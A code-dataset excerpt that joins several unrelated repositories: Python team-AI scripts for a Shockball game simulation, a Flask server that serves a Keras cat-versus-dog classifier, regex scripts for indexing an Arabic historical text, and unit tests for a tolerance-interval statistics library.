self.grounded_balls.append(GroundedBall(ball.position.x, ball.position.y))
else:
player.has_ball = True
self.in_flight_balls.remove(ball)
#player elimination
for player in self.players[:]:
if player.run <=0 or player.pick <=0 or player.throw <= 0:
self.players.remove(player)
self.le_tired_players.append(LeTiredPlayer(player.position.x, player.position.y, player.team))
#check for winner!
if self.winning_team == -1:
if len(self.players) == 0:
self.winning_team = 2
else:
team = self.players[0].team
is_going_still = False
for player in self.players:
if player.team != team:
is_going_still = True
if not is_going_still:
self.winning_team_won_on_update = self.update_count
self.winning_team = team
@classmethod
def DistanceToLineSegment(cls, v, w, p):
l2 = (v-w).length
l2 = l2** 2
if l2 == 0.0:
return (p - v).length
t = ( (p-v) * (w-v) ) / l2
if t < 0.0:
return (p-v).length
elif t > 1.0:
return (p-w).length
projection = v + (w-v) * t
return (p-projection).length
```
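A minimal sketch of driving a full match with the `Simulation` class; the imports assume the repo layout shown in the file headings here:
```python
from Simulation import Simulation
from Team.Basic import Basic
from Team.Blitzy import Blitzy

sim = Simulation(Basic(), Blitzy())
while sim.winning_team == -1:
    sim.Update()
# winning_team is 0 or 1 for a victory, 2 if every player was eliminated.
print("winner:", sim.winning_team, "on update", sim.winning_team_won_on_update)
```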
#### File: Shockball/Team/Basic.py
```python
from AI import AI
from Frameworks.ActionAIFramework import ActionAIFramework
from Frameworks.EasyStatsFramework import EasyStatsFramework
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
import vector
@AI.Team
class Basic(ActionAIFramework, EasyStatsFramework, CommonQueryAIFramework):
def __init__(self):
ActionAIFramework.__init__(self)
EasyStatsFramework.__init__(self)
CommonQueryAIFramework.__init__(self)
logic = [self.Action_GetClosestBall, self.Action_AttackClosestOpponent]
self.actions[1] = logic
self.actions[2] = logic
self.actions[3] = logic
def Action_GetClosestBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos])
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_AttackClosestOpponent(self, player, instructions, ai_input):
target = self.GetClosestAttackableOpponent(player, ai_input)
blocker = self.GetClosestObject(player.position, [p for p in ai_input.player_infos if p.number != player.number])
if blocker and blocker.team == player.team and target:
#just move
instructions.move_target = target.position
return True
elif player.has_ball and target:
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
```
#### File: Shockball/Team/Blitzy.py
```python
from AI import AI
from AI import PlayerUpdateInstructions
from Frameworks.ActionAIFramework import ActionAIFramework
from Frameworks.EasyStatsFramework import EasyStatsFramework
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
import vector
@AI.Team
class Blitzy(ActionAIFramework, EasyStatsFramework, CommonQueryAIFramework):
def __init__(self):
ActionAIFramework.__init__(self)
EasyStatsFramework.__init__(self)
CommonQueryAIFramework.__init__(self)
self.player_starting_positions = {}
self.strategy = [ self.Action_AvoidIncomingBall
, self.Action_AttackClosestOpponent
, self.Action_CatchIncomingPass
, self.Action_GetClosestBall
, self.Action_PassBack
, self.Action_ReturnToStart
]
self.actions[1] = self.strategy
self.actions[2] = self.strategy
self.actions[3] = self.strategy
self.stats = [ PlayerStatsPrebuilts.blitzer, PlayerStatsPrebuilts.blitzer, PlayerStatsPrebuilts.blitzer ]
def Update(self, ai_input):
self.SetupStartingPositionsOnFirstUpdate(ai_input)
return ActionAIFramework.Update(self, ai_input)
def SetupStartingPositionsOnFirstUpdate(self, ai_input):
if len(self.player_starting_positions) == 0:
for player in ai_input.player_infos:
self.player_starting_positions[player.number] = player.position
def Action_AvoidIncomingBall(self, player, instructions, ai_input):
ball = self.GetClosestInFlightThrownBall(player, ai_input)
if ball:
ball_to_player = player.position - ball.position
distance = ball_to_player.length
if distance < 40 and self.IsBallGoingToward(ball, player.position):
instructions.move_target = player.position + ball_to_player
return True
return False
def Action_PassBack(self, player, instructions, ai_input):
if player.has_ball:
instructions.is_passing = True
instructions.pass_target = self.player_starting_positions[player.number]
instructions.move_target = self.player_starting_positions[player.number]
return True
return False
def Action_CatchIncomingPass(self, player, instructions, ai_input):
if ai_input.in_flight_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw == False])
if ball:
distance = (ball.position - player.position).length
ball_to_player = player.position - ball.position
angel_of_approach = ball_to_player * ball.velocity
if distance < 20.0 and angel_of_approach > .5:
ai_input.in_flight_ball_infos.remove(ball)
instructions.move_target = ball.position
return True
return False
def Action_AttackClosestOpponent(self, player, instructions, ai_input):
#attack
target = self.GetClosestAttackableOpponent(player, ai_input)
if player.has_ball and target:
ai_input.player_infos.remove(target)
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
def Action_GetClosestBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos])
ai_input.grounded_ball_infos.remove(ball)
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_ChargeForward(self, player, instructions, ai_input):
instructions.move_target = vector.Vector(player.position.x)
instructions.move_target.y = ai_input.arena_size - self.player_starting_positions[player.number].y
return True
def Action_ReturnToStart(self, player, instructions, ai_input):
instructions.move_target = self.player_starting_positions[player.number]
return True
```
#### File: Shockball/Team/Ditto.py
```python
from AI import AI
@AI.Team
class Ditto(AI):
def __init__(self):
        try:
            # Mirror the first registered team that is not Ditto itself.
            self.other = [team for team in AI.team if team != self.__class__][0]()
        except Exception:
            self.other = None
def Update(self, ai_input):
if self.other:
return self.other.Update(ai_input)
return AI.Update(self, ai_input)
def GetPlayerStats(self, player_number):
if self.other:
return self.other.GetPlayerStats(player_number)
return AI.GetPlayerStats(self, player_number)
```
#### File: Shockball/Team/Fortress.py
```python
import math
from AI import AI
import vector
from Frameworks.ActionAIFramework import ActionAIFramework
from Frameworks.EasyStatsFramework import EasyStatsFramework
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
@AI.Team
class Fortress(EasyStatsFramework, ActionAIFramework, CommonQueryAIFramework):
def __init__(self):
EasyStatsFramework.__init__(self)
ActionAIFramework.__init__(self)
CommonQueryAIFramework.__init__(self)
self.stats = [PlayerStatsPrebuilts.catapault, PlayerStatsPrebuilts.dervish, PlayerStatsPrebuilts.catapault]
self.mode_fetcher = [self.Action_Dodge, self.Action_GetFieldBall, self.Action_PassBallToTeammate, self.Action_StoreBallAtBase, self.Action_GetClosestBall, self.Action_CircleStart]
self.mode_turret = [self.Action_Dodge, self.Action_CatchPass, self.Action_ThrowAtNearbyOpponent, self.Action_CircleStart]
self.mode_solo = [self.Action_Dodge, self.Action_GetClosestBall, self.Action_AttackClosestOpponent]
self.actions[1] = self.mode_turret
self.actions[2] = self.mode_fetcher
self.actions[3] = self.mode_turret
self.base_field_percent = 0.1
self.updates = 0
self.player_starting_positions = {}
def Update(self, ai_input):
self.updates += 1
self.SetupStartingPositionsOnFirstUpdate(ai_input)
my_team_numbers = [player.number if player.number <= 3 else player.number -3 for player in ai_input.player_infos if ai_input.team == player.team]
if 2 not in my_team_numbers or len(my_team_numbers) == 1:
self.actions[1] = self.mode_solo
self.actions[2] = self.mode_solo
self.actions[3] = self.mode_solo
return ActionAIFramework.Update(self, ai_input)
def Action_Dodge(self, player, instructions, ai_input):
ball = self.GetClosestInFlightThrownBall(player, ai_input)
if ball:
ball_to_player = player.position - ball.position
distance = ball_to_player.length
if distance < 40 and self.IsBallGoingToward(ball, player.position):
instructions.move_target = player.position + ball_to_player
return True
return False
def Action_GetFieldBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos if abs(ball.position.y - self.player_starting_positions[player.number].y) >= ai_input.arena_size * self.base_field_percent])
if ball:
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_PassBallToTeammate(self, player, instructions, ai_input):
target = self.GetClosestTeamateWithoutBall(player, ai_input)
if player.has_ball and target:
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_passing = True
instructions.pass_target = target.position
return True
return False
def Action_StoreBallAtBase(self, player, instructions, ai_input):
if player.has_ball:
target = self.player_starting_positions[player.number]
instructions.move_target = target
distance_to_start = (player.position - target).length
if distance_to_start < ai_input.arena_size * self.base_field_percent:
instructions.is_passing = True
instructions.pass_power = 0.0
instructions.pass_target = target
return True
return False
def Action_CircleStart(self, player, instructions, ai_input):
frequency = 10.0
t = self.updates / frequency
x_offset = math.sin(t / 2 * math.pi) * 10
y_offset = math.cos(t / 2 * math.pi) * 10
instructions.move_target = vector.Vector(self.player_starting_positions[player.number].x, self.player_starting_positions[player.number].y)
if instructions.move_target.y == 0.0:
instructions.move_target.y += ai_input.arena_size * self.base_field_percent
else:
instructions.move_target.y -= ai_input.arena_size * self.base_field_percent
instructions.move_target.x += x_offset
instructions.move_target.y += y_offset
return True
def Action_CatchPass(self, player, instructions, ai_input):
if ai_input.in_flight_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw == False])
if ball:
distance = (ball.position - player.position).length
ball_to_player = player.position - ball.position
angel_of_approach = ball_to_player * ball.velocity
if distance < 20.0 and angel_of_approach > .5:
instructions.move_target = ball.position
return True
return False
def Action_ThrowAtNearbyOpponent(self, player, instructions, ai_input):
target = self.GetClosestAttackableOpponent(player, ai_input)
if player.has_ball and target:
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
def Action_GetClosestBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos])
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_AttackClosestOpponent(self, player, instructions, ai_input):
target = self.GetClosestAttackableOpponent(player, ai_input)
if player.has_ball and target:
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
def SetupStartingPositionsOnFirstUpdate(self, ai_input):
if len(self.player_starting_positions) == 0:
for player in ai_input.player_infos:
self.player_starting_positions[player.number] = player.position
```
#### File: Shockball/Team/KaliAI1.py
```python
from AI import AI
from AI import PlayerUpdateInstructions
from AI import AIOutput
import vector
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
from Frameworks.ActionAIFramework import ActionAIFramework
@AI.Team
class KaliAI1(CommonQueryAIFramework, ActionAIFramework):
def __init__(self):
ActionAIFramework.__init__(self)
self.strategy = [ self.Action_DodgeGoose,
self.Action_GetTheFOutOfTheWay,
self.Action_GetClosestBall,
self.Action_GetBallToTargetPlayer,
]
self.actions[1] = self.strategy
self.actions[2] = self.strategy
self.actions[3] = self.strategy
def Action_DodgeGoose(self, player, ins, ai_input):
ball = self.GetClosestInFlightThrownBall(player, ai_input)
if ball:
ball_to_player = (player.position - ball.position)
ball_to_player.normalize()
bv = vector.Vector(x=ball.velocity.x, y=ball.velocity.y)
bv.normalize()
incoming = ball_to_player * bv
if incoming > 0.75 and self.Distance(player, ball) < 31:
ins.move_target = ((player.position - ball.position) + player.position)
ins.is_moving = True
return True
return False
def Action_GetBallToTargetPlayer(self, player, ins, ai_input):
targetable_players = self.GetTargetablePlayers(ai_input, player)
targeted_player = self.GetClosestOfPositionalObjects(player, targetable_players)
        if targeted_player is not None:
throwing_distance = player.throw * 10
if (targeted_player.position - player.position).length > throwing_distance:
ins.is_moving = True
ins.move_target = targeted_player.position
return True
elif targeted_player.team == player.team:
ins.is_passing = True
ins.pass_target = targeted_player.position
return True
else:
ins.is_throwing = True
ins.throw_target = targeted_player.position
return True
return False
def Action_GetClosestBall(self, player, ins, ai_input):
if not player.has_ball:
closest_ball = self.GetClosestOfPositionalObjects(player, ai_input.grounded_ball_infos + [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw == False])
            if closest_ball is None:
return False # GivePlayerSomethingToDoIfNoBallsAvailable
if (closest_ball.position - player.position).length < 2:
ins.is_picking = True
return True
else:
ins.is_moving = True
ins.move_target = closest_ball.position
return True
return False
def Action_GetTheFOutOfTheWay(self, player, ins, ai_input):
teammates = self.GetTeammates(ai_input)
for teammate in teammates:
if teammate.number == player.number:
continue
else:
if self.Distance(teammate, player) < 1.6 and player.number < teammate.number:
ins.is_moving = True
                    ins.move_target = ((player.position - teammate.position) + player.position) #I Totally Know It Is Equivalent To 2x - y, But Reasons.
return True
return False
def GetTargetablePlayers(self, ai_input, player):
kill = self.GetClosestAttackableOpponent(player, ai_input)
if kill:
kill_dst = self.Distance(player, kill)
if kill_dst <= player.throw * 10:
return [kill]
targetable_players = list()
for considered_player in ai_input.player_infos:
if considered_player.has_ball and considered_player.team == player.team:
continue
if considered_player.team != player.team:
targetable_players.append(considered_player)
continue
opponent_players = list()
for opponent in ai_input.player_infos:
if opponent.team != player.team:
opponent_players.append(opponent)
closest_opponent = self.GetClosestOfPositionalObjects(considered_player, opponent_players)
            if closest_opponent is None:
continue
distance = (considered_player.position - closest_opponent.position).length
max_throwing_distance = considered_player.throw * 10
if distance <= max_throwing_distance:
targetable_players.append(considered_player)
return targetable_players
def GetClosestOfPositionalObjects(self, positional_object, positional_object_list):
if len(positional_object_list) == 0:
return None
closest_positional_object = positional_object_list[0]
closest_distance = (positional_object.position - positional_object_list[0].position).length
for considered_positional_object in positional_object_list:
distance = (positional_object.position - considered_positional_object.position).length
if distance < closest_distance:
closest_distance = distance
closest_positional_object = considered_positional_object
return closest_positional_object
```
|
{
"source": "jedkalita/Flask-API-pranjitkalita",
"score": 3
}
|
#### File: jedkalita/Flask-API-pranjitkalita/server.py
```python
from keras.models import load_model
from keras.applications import ResNet50
from keras.preprocessing.image import img_to_array
from keras.preprocessing import image
from keras.applications import imagenet_utils
from PIL import Image
import numpy as np
import flask
import io
app = flask.Flask(__name__) #initialize our Flask application
model = None #initialize the given cats and dogs keras model
model_resnet50 = None #initialize the ResNet50 keras model
def load_models():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global model
global model_resnet50
# model = ResNet50(weights="imagenet")
model = load_model('cats_dogs_model.hdf5')
model_resnet50 = ResNet50(weights="imagenet")
#load the image from the file into a (150x150x3) tensor and add the batch
#dimension the model expects
def load_image(img_path, show=False):
img = image.load_img(img_path, target_size=(150, 150))
img_tensor = image.img_to_array(img) #(height, width, channels)
img_tensor = np.expand_dims(img_tensor, axis=0) #(1, height, width, channels)
# new dimension because the model expects 4 dimensions
img_tensor /= 255. #values in the range [0, 1]
return img_tensor
#preprocessing the image for ResNet50 model input (224x224x3)
def prepare_image(image, target):
# if the image mode is not RGB, convert it
if image.mode != "RGB":
image = image.convert("RGB")
# resize the input image and preprocess it
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
# return the processed image
return image
#API endpoint - given an image, return a prediction whether it is a dog or cat - uses POST method
#returns a string indicating whether the predicted animal is a cat or a dog
@app.route("/predict_cat_or_dog", methods=["POST"])
def predict_cat_or_dog():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"]
new_image = load_image(image)
preds = model.predict(new_image)
data["predictions"] = [] #to jsonify
if preds > 0.5: #if it is closer to 1, then it is a dog
result = 'Dog'
else: #if it is closer to 0, then it is a cat
result = 'Cat'
return 'Predicted animal is: ' + result + '\n'
#API endpoint - given an image, return a prediction whether it is a dog or cat - uses POST method
#returns a JSON with name of predicted animal and probability (the value returned by the model)
@app.route("/predict_cat_or_dog_with_probability", methods=["POST"])
def predict_cat_or_dog_with_probability():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"]
new_image = load_image(image)
preds = model.predict(new_image)
data["predictions"] = [] #to jsonify
if preds > 0.5: #if it is closer to 1, then it is a dog
result = 'Dog'
else: #if it is closer to 0, then it is a cat
result = 'Cat'
data["success"] = True
r = {"animal": result, "probability": float(preds[0][0])}
data["predictions"].append(r)
return flask.jsonify(data)
#API endpoint - given an image, return a prediction whether it is a dog or cat - uses GET method
#same as above in structure and functionality. Just checking GET vs POST.
@app.route("/predict_cat_or_dog_with_probability_get", methods=["GET"])
def predict_cat_or_dog_with_probability_get():
data = {"success": False}
if flask.request.method == "GET":
if flask.request.files.get("image"):
image = flask.request.files["image"]
new_image = load_image(image)
preds = model.predict(new_image)
data["predictions"] = []
if preds > 0.5: #if it is closer to 1, then it is a dog
result = 'Dog'
else: #if it is closer to 0, then it is a cat
result = 'Cat'
data["success"] = True
r = {"animal": result, "probability": float(preds[0][0])}
data["predictions"].append(r)
return flask.jsonify(data)
#API endpoint - uses a heuristic to calculate how sure we are that the predicted image is a dog
#or a cat. If we are more than 50% sure, we display that confidence. Otherwise, we call the
#ResNet50 model, trained on a wide variety of objects, to give its top predictions and return
#the combined statement.
@app.route("/predict_with_confidence", methods=["POST"])
def predict_with_confidence():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"]
image2 = flask.request.files["image"].read()
new_image = load_image(image)
preds = model.predict(new_image) #value returned by our pre-trained Keras model
data["predictions"] = []
if preds > 0.5:
result = 'Dog'
                surity = (abs(0.5 - preds) * 2.0) * 100.0 #confidence grows with the distance
                #of the prediction value from the 0.5 decision boundary
else:
result = 'Cat'
                surity = (abs(0.5 - preds) * 2.0) * 100.0 #confidence grows with the distance
                #of the prediction value from the 0.5 decision boundary
data["success"] = True
r = {"animal": result, "probability": float(preds[0][0])}
data["predictions"].append(r)
# return result + '\n'
if (surity < 50): #if low confidence, ie less than 50% confidence
statement = 'The animal is a ' + str(result) + ' with low confidence of ' + str(surity[0][0]) + '%.' + '\n'
#then use the ResNet50 model to give the top predictions for what the object could be
image2 = Image.open(io.BytesIO(image2)) #do the necessary preprocessing
image2 = prepare_image(image2, target=(224, 224)) #target size is (224x224x3)
predictions = model_resnet50.predict(image2) #call the ResNet50 model and get the predictions
results = imagenet_utils.decode_predictions(predictions)
statement = statement + 'It is mostly one of the following with probabilities...' + '\n'
for (imagenetID, label, prob) in results[0]:
statement = statement + str(label) + ':' + str(prob) + '\n'
else:
statement = 'The animal is a ' + str(result) + ' with high confidence of ' + str(surity[0][0]) + '%.' + '\n'
return statement
# load the models and start the server
if __name__ == "__main__":
print(("* Loading Keras model, ResNet50 model. Starting server.."
"Please wait until the server has started."))
load_models()
app.run(host='0.0.0.0')
```
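A quick client-side sketch for exercising the endpoints above with the `requests` library; the host, port, and image path are assumptions (Flask's default port, a local file):
```python
import requests

url = 'http://localhost:5000/predict_cat_or_dog_with_probability'
with open('example.jpg', 'rb') as f:  # hypothetical image file
    response = requests.post(url, files={'image': f})
print(response.json())
```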
|
{
"source": "jedlitools/find-for-me",
"score": 4
}
|
#### File: jedlitools/find-for-me/ex13_index_more_words.py
```python
import re
filename = 'baladhuri_futuh.txt'
text = open(filename, mode='r', encoding='utf-8').read()
def index_generator(word, text):
juz = 'الجزء:'
safha = 'الصفحة:'
page_regex = juz + r' \d+ ¦ ' + safha + r' \d+'
search_regex = word + r'.+?(' + page_regex + ')'
pagination = re.findall(search_regex, text, re.DOTALL)
return pagination
search_words = ['عيسابا']
for word in search_words:
index = index_generator(word, text)
print(word)
for page in index:
print(page)
```
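The page markers that `index_generator` keys on look like `الجزء: 1 ¦ الصفحة: 23`; a toy call of the function above on a made-up snippet shows the shape of the result:
```python
toy_text = 'ذكر عيسابا في الخبر الجزء: 1 ¦ الصفحة: 23'
print(index_generator('عيسابا', toy_text))  # -> ['الجزء: 1 ¦ الصفحة: 23']
```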
#### File: jedlitools/find-for-me/ex18_prefixes_conjunctions.py
```python
import re
filename = 'baladhuri_futuh.txt'
text = open(filename, mode='r', encoding='utf-8').read()
def word_counter(search_word, search_text):
freq_word = len(re.findall(search_word, search_text))
freq_word = str(freq_word)
print(search_word + ' appears ' + freq_word + ' times in this text')
word = r"\bو?حكم\b"
word_counter(word, text)
```
|
{
"source": "jedludlow/tolerance_interval_py",
"score": 3
}
|
#### File: tolerance_interval_py/tests/test_oneside_hansonkoopmans.py
```python
import numpy as np
from toleranceinterval.oneside import hanson_koopmans
import unittest
class TestEverything(unittest.TestCase):
# Values from:
# <NAME>., & <NAME>. (1964). Tolerance Limits for
# the Class of Distributions with Increasing Hazard Rates. Ann. Math.
# Statist., 35(4), 1561-1570. https://doi.org/10.1214/aoms/1177700380
#
# data[:, [n, p, g, b]]
data = np.array([[2, 0.25, 0.9, 8.618],
[2, 0.25, 0.95, 17.80],
[2, 0.25, 0.99, 91.21],
[3, 0.25, 0.90, 5.898],
[3, 0.25, 0.95, 12.27],
[3, 0.25, 0.99, 63.17],
[4, 0.25, 0.90, 4.116],
[4, 0.25, 0.95, 8.638],
[4, 0.25, 0.99, 44.78],
[5, 0.25, 0.90, 2.898],
[5, 0.25, 0.95, 6.154],
[5, 0.25, 0.99, 32.17],
[6, 0.25, 0.90, 2.044],
[6, 0.25, 0.95, 4.411],
[6, 0.25, 0.99, 23.31],
[7, 0.25, 0.90, 1.437],
[7, 0.25, 0.95, 3.169],
[7, 0.25, 0.99, 16.98],
[8, 0.25, 0.90, 1.001],
[8, 0.25, 0.95, 2.275],
[8, 0.25, 0.99, 12.42],
[9, 0.25, 0.95, 1.627],
[9, 0.25, 0.99, 9.100],
[2, 0.10, 0.90, 17.09],
[2, 0.10, 0.95, 35.18],
[2, 0.10, 0.99, 179.8],
[3, 0.10, 0.90, 13.98],
[3, 0.10, 0.95, 28.82],
[3, 0.10, 0.99, 147.5],
[4, 0.10, 0.90, 11.70],
[4, 0.10, 0.95, 24.17],
[4, 0.10, 0.99, 123.9],
[5, 0.10, 0.90, 9.931],
[5, 0.10, 0.95, 20.57],
[5, 0.10, 0.99, 105.6],
[6, 0.10, 0.90, 8.512],
[6, 0.10, 0.95, 17.67],
[6, 0.10, 0.99, 90.90],
[7, 0.10, 0.90, 7.344],
[7, 0.10, 0.95, 15.29],
[7, 0.10, 0.99, 78.80],
[8, 0.10, 0.90, 6.368],
[8, 0.10, 0.95, 13.30],
[8, 0.10, 0.99, 68.68],
[9, 0.10, 0.90, 5.541],
[9, 0.10, 0.95, 11.61],
[9, 0.10, 0.99, 60.10],
[2, 0.05, 0.90, 23.65],
[2, 0.05, 0.95, 48.63],
[2, 0.05, 0.99, 248.4],
[3, 0.05, 0.90, 20.48],
[3, 0.05, 0.95, 42.15],
[3, 0.05, 0.99, 215.4],
[4, 0.05, 0.90, 18.12],
[4, 0.05, 0.95, 37.32],
[4, 0.05, 0.99, 190.9],
[5, 0.05, 0.90, 16.24],
[5, 0.05, 0.95, 33.49],
[5, 0.05, 0.99, 171.4],
[6, 0.05, 0.90, 14.70],
[6, 0.05, 0.95, 30.33],
[6, 0.05, 0.99, 155.4],
[7, 0.05, 0.90, 13.39],
[7, 0.05, 0.95, 27.66],
[7, 0.05, 0.99, 141.8],
[8, 0.05, 0.90, 12.26],
[8, 0.05, 0.95, 25.35],
[8, 0.05, 0.99, 130.0],
[9, 0.05, 0.90, 11.27],
[9, 0.05, 0.95, 23.33],
[9, 0.05, 0.99, 119.8],
[20, 0.05, 0.90, 5.077],
[20, 0.05, 0.95, 10.68],
[20, 0.05, 0.99, 55.47]])
def test_upper_table_bounds(self):
j = 1
for i, row in enumerate(self.data):
n = int(row[0])
p = 1.0-row[1]
g = row[2]
b = row[3]
x = np.random.random(n) + 1000.
x.sort()
bound = hanson_koopmans(x, p, g, j=1)[0]
b_ = (bound - x[n-j-1]) / (x[-1] - x[n-j-1])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_lower_table_bounds(self):
j = 1
for i, row in enumerate(self.data):
n = int(row[0])
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n) + 1000.
x.sort()
bound = hanson_koopmans(x, p, g, j=1)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_random_shapes(self):
M = [3, 10, 20]
N = [5, 10, 20]
J = [1, 2]
for m in M:
for n in N:
for j in J:
x = np.random.random((m, n))
bounds = hanson_koopmans(x, 0.1, 0.95, j=j)
_m = bounds.size
self.assertTrue(_m == m)
def test_value_error(self):
with self.assertRaises(ValueError):
x = np.random.random((1, 2, 4, 3))
hanson_koopmans(x, 0.1, 0.9)
def test_step_size(self):
i = 0
row = self.data[i]
n = int(row[0])
j = n-1
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g, step_size=1e-6)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
    def test_newton_raphson(self):
i = 0
row = self.data[i]
n = int(row[0])
j = n-1
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g, method='newton-raphson')[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='newton-raphson',
max_iter=50)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='newton-raphson',
tol=1e-6)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_halley(self):
i = 0
row = self.data[i]
n = int(row[0])
j = n-1
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g, method='halley')[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='halley', max_iter=50)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='halley', tol=1e-6)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_fall_back(self):
p = 0.01
g = 0.95
n = 300
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g)[0]
self.assertTrue(np.isclose(bound, x[0]))
if __name__ == '__main__':
np.random.seed(121)
unittest.main()
```
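Restating the test logic above as plain usage: a one-sided lower tolerance bound covering all but the worst 5% of the population with 95% confidence looks like this (the sample values are invented):
```python
import numpy as np
from toleranceinterval.oneside import hanson_koopmans

x = np.sort(np.array([3.1, 2.8, 3.4, 2.9, 3.0]))
lower = hanson_koopmans(x, 0.05, 0.95)[0]  # p=0.05 requests the lower tail
print(lower)
```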
#### File: tolerance_interval_py/tests/test_twoside_normal_factor_iso.py
```python
import numpy as np
import toleranceinterval.twoside as ts
import unittest
def decimal_ceil(x, places):
"""
Apply ceiling function at a decimal place.
The tables of tolerance factors in ISO 16269-6:2014 provide
the tolerance factors to a certain number of decimal places. The values
at that final decimal place reflect the application of the ceiling function
at that decimal place.
"""
x *= 10 ** places
x = np.ceil(x)
x /= 10 ** places
return x
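# Illustrative check of the rounding convention (not a value from the standard):
# decimal_ceil(1.64485, places=4) -> 1.6449, i.e. the last digit rounds up.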
class BaseTestIso:
class TestIsoTableF(unittest.TestCase):
def test_tolerance_factor(self):
for row_idx, row in enumerate(self.factor_k5):
for col_idx, k5 in enumerate(row):
k = ts.normal_factor(
self.sample_size[row_idx],
self.coverage,
self.confidence,
method='exact',
m=self.number_of_samples[col_idx])
k = decimal_ceil(k, places=4)
self.assertAlmostEqual(k, k5, places=4)
class TestIsoF1(BaseTestIso.TestIsoTableF):
coverage = 0.90
confidence = 0.90
# This is n from the table.
sample_size = np.array([
2, 8, 16, 35, 100, 300, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 2
15.5124, 6.0755, 4.5088, 3.8875, 3.5544,
3.3461, 3.2032, 3.0989, 3.0193, 2.9565,
# n = 8
2.7542, 2.3600, 2.2244, 2.1530, 2.1081,
2.0769, 2.0539, 2.0361, 2.0220, 2.0104,
# n = 16
2.2537, 2.0574, 1.9833, 1.9426, 1.9163,
1.8977, 1.8837, 1.8727, 1.8638, 1.8564,
# n = 35
1.9906, 1.8843, 1.8417, 1.8176, 1.8017,
1.7902, 1.7815, 1.7747, 1.7690, 1.7643,
# n = 100
1.8232, 1.7697, 1.7473, 1.7343, 1.7256,
1.7193, 1.7144, 1.7105, 1.7073, 1.7047,
# n = 300
1.7401, 1.7118, 1.6997, 1.6925, 1.6877,
1.6842, 1.6815, 1.6793, 1.6775, 1.6760,
# n = 1000
1.6947, 1.6800, 1.6736, 1.6698, 1.6672,
1.6653, 1.6639, 1.6627, 1.6617, 1.6609,
# n = infinity
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
])
